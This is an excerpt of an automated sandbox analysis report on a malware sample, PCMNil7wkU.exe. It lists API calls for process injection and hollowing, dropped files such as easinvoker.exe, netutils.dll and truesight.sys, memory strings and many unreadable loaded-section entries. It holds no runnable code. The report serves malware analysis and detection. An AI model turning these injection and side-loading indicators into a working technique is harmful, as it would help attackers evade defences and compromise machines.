Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0411FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_0411FCD8
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0411FD38 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,	0_2_0411FD38
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04127E4C CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_04127E4C
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0411FB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_0411FB80
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0411FB7E GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_0411FB7E
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040CCA40 WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,	5_2_040CCA40
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040CB768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	5_2_040CB768
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_0408FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	5_2_0408FCD8
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_0408FD38 LoadLibraryExA,GetProcAddress,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,	5_2_0408FD38
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_04097E4C GetMonitorInfoA,CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	5_2_04097E4C
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_0408FB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	5_2_0408FB80
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040CB684 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	5_2_040CB684
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040C3114 NtdllDefWindowProc_A,	5_2_040C3114
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040AF340 NtdllDefWindowProc_A,GetCapture,	5_2_040AF340
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040A3E00 GetSubMenu,SaveDC,RestoreDC,NtdllDefWindowProc_A,	5_2_040A3E00
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040C38CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	5_2_040C38CC
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040C3990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	5_2_040C3990
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_0408FB7E GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	5_2_0408FB7E

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_0415CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,

0_2_0415CA40

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

File created: C:\Users\Public\Libraries\truesight.sys

Jump to behavior

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0414C508	0_2_0414C508
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04102160	0_2_04102160
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0417A1DD	0_2_0417A1DD
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04178D18	0_2_04178D18
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0417AACF	0_2_0417AACF
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0417906B	0_2_0417906B
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_04133E00	0_2_04133E00
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_041759D6	0_2_041759D6
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0418BA28	0_2_0418BA28
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00408C60	4_2_00408C60
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_0040DC11	4_2_0040DC11
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00407C3F	4_2_00407C3F
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00418CCC	4_2_00418CCC
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00406CA0	4_2_00406CA0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_004028B0	4_2_004028B0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_0041A4BE	4_2_0041A4BE
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00418244	4_2_00418244
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00401650	4_2_00401650
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00402F20	4_2_00402F20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_004193C4	4_2_004193C4
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00418788	4_2_00418788
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00402F89	4_2_00402F89
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_00402B90	4_2_00402B90
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_004073A0	4_2_004073A0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_31B1FC28	4_2_31B1FC28
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_31B1F358	4_2_31B1F358
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_31B11030	4_2_31B11030
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_31B11020	4_2_31B11020
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_31B1F010	4_2_31B1F010
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_35BD4770	4_2_35BD4770
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_35BD1F80	4_2_35BD1F80
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_2_35BD01B0	4_2_35BD01B0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00408C60	4_1_00408C60
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_0040DC11	4_1_0040DC11
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00407C3F	4_1_00407C3F
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00418CCC	4_1_00418CCC
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00406CA0	4_1_00406CA0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_004028B0	4_1_004028B0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_0041A4BE	4_1_0041A4BE
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00418244	4_1_00418244
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00401650	4_1_00401650
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00402F20	4_1_00402F20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_004193C4	4_1_004193C4
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00418788	4_1_00418788
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00402F89	4_1_00402F89
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_00402B90	4_1_00402B90
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 4_1_004073A0	4_1_004073A0
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040BC508	5_2_040BC508
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_04072160	5_2_04072160
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: 5_2_040A3E00	5_2_040A3E00
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_0040DC11	7_2_0040DC11
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00407C3F	7_2_00407C3F
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00418CCC	7_2_00418CCC
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00406CA0	7_2_00406CA0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_004028B0	7_2_004028B0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_0041A4BE	7_2_0041A4BE
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00418244	7_2_00418244
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00401650	7_2_00401650
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00402F20	7_2_00402F20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_004193C4	7_2_004193C4
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00418788	7_2_00418788
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00402F89	7_2_00402F89
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_004073A0	7_2_004073A0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_242C1020	7_2_242C1020
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_2_242C1030	7_2_242C1030
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00408C60	7_1_00408C60
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_0040DC11	7_1_0040DC11
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00407C3F	7_1_00407C3F
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00418CCC	7_1_00418CCC
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00406CA0	7_1_00406CA0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_004028B0	7_1_004028B0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_0041A4BE	7_1_0041A4BE
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00418244	7_1_00418244
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00401650	7_1_00401650
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00402F20	7_1_00402F20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_004193C4	7_1_004193C4
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00418788	7_1_00418788
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00402F89	7_1_00402F89
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_00402B90	7_1_00402B90
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 7_1_004073A0	7_1_004073A0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00418244	9_2_00418244
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00401650	9_2_00401650
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00418788	9_2_00418788
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_31D80890	9_2_31D80890
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_31D81030	9_2_31D81030
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_2_31D81020	9_2_31D81020
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00408C60	9_1_00408C60
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_0040DC11	9_1_0040DC11
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00407C3F	9_1_00407C3F
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00418CCC	9_1_00418CCC
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00406CA0	9_1_00406CA0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_004028B0	9_1_004028B0
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_0041A4BE	9_1_0041A4BE
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00418244	9_1_00418244
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00401650	9_1_00401650
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00402F20	9_1_00402F20
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_004193C4	9_1_004193C4
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00418788	9_1_00418788
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00402F89	9_1_00402F89
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_00402B90	9_1_00402B90
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: 9_1_004073A0	9_1_004073A0

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\netutils.dll C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6

Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: String function: 04074B0C appears 363 times
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: String function: 04074980 appears 77 times
Source: C:\Users\Public\Libraries\Akaelkov.PIF	Code function: String function: 04076B54 appears 87 times
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: String function: 0040FB9C appears 60 times
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: String function: 0040D606 appears 144 times
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: String function: 0040E1D8 appears 264 times
Source: C:\Users\Public\Libraries\vokleakA.pif	Code function: String function: 00415639 appears 36 times
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: String function: 04104980 appears 78 times
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: String function: 04104788 appears 83 times
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: String function: 04106B54 appears 87 times
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: String function: 04104B0C appears 382 times

Source: netutils.dll.0.dr

Static PE information: Number of sections : 19 > 10

Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs PCMNil7wkU.exe
Source: PCMNil7wkU.exe, 00000000.00000002.2024259501.000000007EA80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameStub.exe" vs PCMNil7wkU.exe

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Section loaded: ??.dll	Jump to behavior
